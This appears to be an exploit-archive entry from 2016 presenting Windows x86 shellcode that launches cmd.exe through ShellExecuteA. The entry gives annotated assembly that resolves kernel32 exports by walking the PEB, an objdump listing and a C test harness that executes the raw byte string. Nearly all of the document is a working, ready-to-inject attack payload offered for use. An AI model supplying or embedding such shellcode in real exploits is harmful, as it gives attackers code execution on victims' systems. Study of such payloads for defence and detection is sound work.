Windows/x86 ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1) Shellcode

2016-06-22
ID: 86267
CVE: None
Download vulnerable application: None
/*
      # Title : Windows x86 ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1) shellcode
    # Date : 22-06-2016
    # Author : Roziul Hasan Khan Shifat
    # Tested on : Windows 7,10 x86
  */
    /*
  section .text
    global _start
_start:
xor ecx,ecx
mov eax,[fs:ecx+0x30] ;EAX=PEB
mov eax,[eax+0xc] ;EAX=PEB->Ldr
mov esi,[eax+0x14] ;ESI=PEB->Ldr.InMemOrderModuleList
lodsd ; EAX=ntdll.dll
xchg eax,esi ;EAX=ESI , ESI=EAX
lodsd ; EAX=Third(kernel32)
mov ebx,[eax+0x10] ;PVOID Dllbase (base address)
  ;-------------------------------
  mov edx,[ebx+0x3c] ;(kernel32.dll base address+0x3c)=DOS->e_lfanew
add edx,ebx ;(DOS->e_lfanew+kernel32.dll base address)=PE Header
mov edx,[edx+0x78] ;(PE Header+0x78)=DataDirectory->VirtualAddress
add edx,ebx ;(DataDirectory->VirtualAddress+kernel32.dll base address)=export table of kernel32.dll(IMAGE_EXPORT_DIRECTORY)
mov esi,[edx+0x20]; (IMAGE_EXPORT_DIRECTORY+0x20)=AddressOfNames
add esi,ebx ;ESI=(AddressOfNames+kernel32.dll base address)=kernel32 AddressOfNames
xor ecx,ecx
;-----------------------
  Get_func:
inc ecx ;increment the ordinal
lodsd ;Get name offset
add eax,ebx ;(offset+kernel32.dll base adress)=Get function name
cmp dword [eax],0x50746547 ;GetP
jnz Get_func
cmp dword [eax+0x4],0x41636f72 ;rocA
jnz Get_func
cmp dword [eax+0x8],0x65726464 ;ddre
jnz Get_func
  ;---------------------
  mov esi,[edx+0x24] ;(IMAGE_EXPORT_DIRECTORY+0x24) AddressOfNameOrdinals
  add esi,ebx ;ESI=(AddressOfNameOrdinals+kernel32.dll)=AddressOfNameOrdinals of kernel32.dll
  mov cx,[esi+ecx*2] ;CX=Number of Function
dec ecx
mov esi,[edx+0x1c] ; (IMAGE_EXPORT_DIRECTORY+0x1c)=AddressOfFunctions
  add esi,ebx ;ESI=beginning of Address table
mov edx,[esi+ecx*4];EDX=Pointer(offset)
add edx,ebx ;Edx=GetProcAddress
  ;-----------------------------
xor esi,esi
mov esi,edx ;backup of GetProcAddress
xor edi,edi
mov edi,ebx
;--------------
  ;finding address of LoadLibraryA()
xor ecx,ecx
push ecx
  push 0x41797261
push 0x7262694c
push 0x64616f4c
  push esp
push ebx ;address of kernel32.dll
  call edx 
  add esp,12
;-----------------
xor ecx,ecx
;finding address of ExitProcess
push 0x42737365
mov [esp+3],cl
push 0x636f7250
push 0x74697845
push esp
push edi
xor edi,edi
mov edi,eax
call esi
  ;----------------------------
add esp,12
;LoadLibraryA("shell32.dll")
xor ecx,ecx
push ecx
push 0x416c6c64
mov [esp+3],cl
push 0x2e32336c
push 0x6c656873
  push esp
xor edx,edx
mov edx,edi ;Edx=LoadLibraryA
mov edi,eax ;edi=ExitProcess
call edx
add esp,11
;------------------
  ;finding address of ShellExecuteA()
xor ecx,ecx
push 0x42424241
mov [esp+1],cl
  push 0x65747563
push 0x6578456c
push 0x6c656853
  push esp
push eax
  call esi
;-------------------
;ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1);
add esp,13
xor ecx,ecx
push 0x41657865
mov [esp+3],cl
push 0x2e646d63
  push esp
pop ecx
    xor edx,edx
inc edx
  push edx
xor edx,edx
push edx
push edx
  push ecx
push edx
push edx
  call eax
  call edi
  */
    /*
  Disassembly of section .text:
  00401000 <_start>:
  401000:   31 c9                   xor    %ecx,%ecx
  401002:   64 8b 41 30             mov    %fs:0x30(%ecx),%eax
  401006:   8b 40 0c                mov    0xc(%eax),%eax
  401009:   8b 70 14                mov    0x14(%eax),%esi
  40100c:   ad                      lods   %ds:(%esi),%eax
  40100d:   96                      xchg   %eax,%esi
  40100e:   ad                      lods   %ds:(%esi),%eax
  40100f:   8b 58 10                mov    0x10(%eax),%ebx
  401012:   8b 53 3c                mov    0x3c(%ebx),%edx
  401015:   01 da                   add    %ebx,%edx
  401017:   8b 52 78                mov    0x78(%edx),%edx
  40101a:   01 da                   add    %ebx,%edx
  40101c:   8b 72 20                mov    0x20(%edx),%esi
  40101f:   01 de                   add    %ebx,%esi
  401021:   31 c9                   xor    %ecx,%ecx
  00401023 <Get_func>:
  401023:   41                      inc    %ecx
  401024:   ad                      lods   %ds:(%esi),%eax
  401025:   01 d8                   add    %ebx,%eax
  401027:   81 38 47 65 74 50       cmpl   $0x50746547,(%eax)
  40102d:   75 f4                   jne    401023 <Get_func>
  40102f:   81 78 04 72 6f 63 41    cmpl   $0x41636f72,0x4(%eax)
  401036:   75 eb                   jne    401023 <Get_func>
  401038:   81 78 08 64 64 72 65    cmpl   $0x65726464,0x8(%eax)
  40103f:   75 e2                   jne    401023 <Get_func>
  401041:   8b 72 24                mov    0x24(%edx),%esi
  401044:   01 de                   add    %ebx,%esi
  401046:   66 8b 0c 4e             mov    (%esi,%ecx,2),%cx
  40104a:   49                      dec    %ecx
  40104b:   8b 72 1c                mov    0x1c(%edx),%esi
  40104e:   01 de                   add    %ebx,%esi
  401050:   8b 14 8e                mov    (%esi,%ecx,4),%edx
  401053:   01 da                   add    %ebx,%edx
  401055:   31 f6                   xor    %esi,%esi
  401057:   89 d6                   mov    %edx,%esi
  401059:   31 ff                   xor    %edi,%edi
  40105b:   89 df                   mov    %ebx,%edi
  40105d:   31 c9                   xor    %ecx,%ecx
  40105f:   51                      push   %ecx
  401060:   68 61 72 79 41          push   $0x41797261
  401065:   68 4c 69 62 72          push   $0x7262694c
  40106a:   68 4c 6f 61 64          push   $0x64616f4c
  40106f:   54                      push   %esp
  401070:   53                      push   %ebx
  401071:   ff d2                   call   *%edx
  401073:   83 c4 0c                add    $0xc,%esp
  401076:   31 c9                   xor    %ecx,%ecx
  401078:   68 65 73 73 42          push   $0x42737365
  40107d:   88 4c 24 03             mov    %cl,0x3(%esp)
  401081:   68 50 72 6f 63          push   $0x636f7250
  401086:   68 45 78 69 74          push   $0x74697845
  40108b:   54                      push   %esp
  40108c:   57                      push   %edi
  40108d:   31 ff                   xor    %edi,%edi
  40108f:   89 c7                   mov    %eax,%edi
  401091:   ff d6                   call   *%esi
  401093:   83 c4 0c                add    $0xc,%esp
  401096:   31 c9                   xor    %ecx,%ecx
  401098:   51                      push   %ecx
  401099:   68 64 6c 6c 41          push   $0x416c6c64
  40109e:   88 4c 24 03             mov    %cl,0x3(%esp)
  4010a2:   68 6c 33 32 2e          push   $0x2e32336c
  4010a7:   68 73 68 65 6c          push   $0x6c656873
  4010ac:   54                      push   %esp
  4010ad:   31 d2                   xor    %edx,%edx
  4010af:   89 fa                   mov    %edi,%edx
  4010b1:   89 c7                   mov    %eax,%edi
  4010b3:   ff d2                   call   *%edx
  4010b5:   83 c4 0b                add    $0xb,%esp
  4010b8:   31 c9                   xor    %ecx,%ecx
  4010ba:   68 41 42 42 42          push   $0x42424241
  4010bf:   88 4c 24 01             mov    %cl,0x1(%esp)
  4010c3:   68 63 75 74 65          push   $0x65747563
  4010c8:   68 6c 45 78 65          push   $0x6578456c
  4010cd:   68 53 68 65 6c          push   $0x6c656853
  4010d2:   54                      push   %esp
  4010d3:   50                      push   %eax
  4010d4:   ff d6                   call   *%esi
  4010d6:   83 c4 0d                add    $0xd,%esp
  4010d9:   31 c9                   xor    %ecx,%ecx
  4010db:   68 65 78 65 41          push   $0x41657865
  4010e0:   88 4c 24 03             mov    %cl,0x3(%esp)
  4010e4:   68 63 6d 64 2e          push   $0x2e646d63
  4010e9:   54                      push   %esp
  4010ea:   59                      pop    %ecx
  4010eb:   31 d2                   xor    %edx,%edx
  4010ed:   42                      inc    %edx
  4010ee:   52                      push   %edx
  4010ef:   31 d2                   xor    %edx,%edx
  4010f1:   52                      push   %edx
  4010f2:   52                      push   %edx
  4010f3:   51                      push   %ecx
  4010f4:   52                      push   %edx
  4010f5:   52                      push   %edx
  4010f6:   ff d0                   call   *%eax
  4010f8:   ff d7                   call   *%edi
  */
    #include<stdio.h>
#include<string.h>
char shellcode[]=\
  "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xf6\x89\xd6\x31\xff\x89\xdf\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\xd2\x83\xc4\x0c\x31\xc9\x68\x65\x73\x73\x42\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x57\x31\xff\x89\xc7\xff\xd6\x83\xc4\x0c\x31\xc9\x51\x68\x64\x6c\x6c\x41\x88\x4c\x24\x03\x68\x6c\x33\x32\x2e\x68\x73\x68\x65\x6c\x54\x31\xd2\x89\xfa\x89\xc7\xff\xd2\x83\xc4\x0b\x31\xc9\x68\x41\x42\x42\x42\x88\x4c\x24\x01\x68\x63\x75\x74\x65\x68\x6c\x45\x78\x65\x68\x53\x68\x65\x6c\x54\x50\xff\xd6\x83\xc4\x0d\x31\xc9\x68\x65\x78\x65\x41\x88\x4c\x24\x03\x68\x63\x6d\x64\x2e\x54\x59\x31\xd2\x42\x52\x31\xd2\x52\x52\x51\x52\x52\xff\xd0\xff\xd7";
  main()
{
printf("shellcode length %ld\n",(long)strlen(shellcode));
(* (int(*)()) shellcode) ();
}
1-4-2 (www01)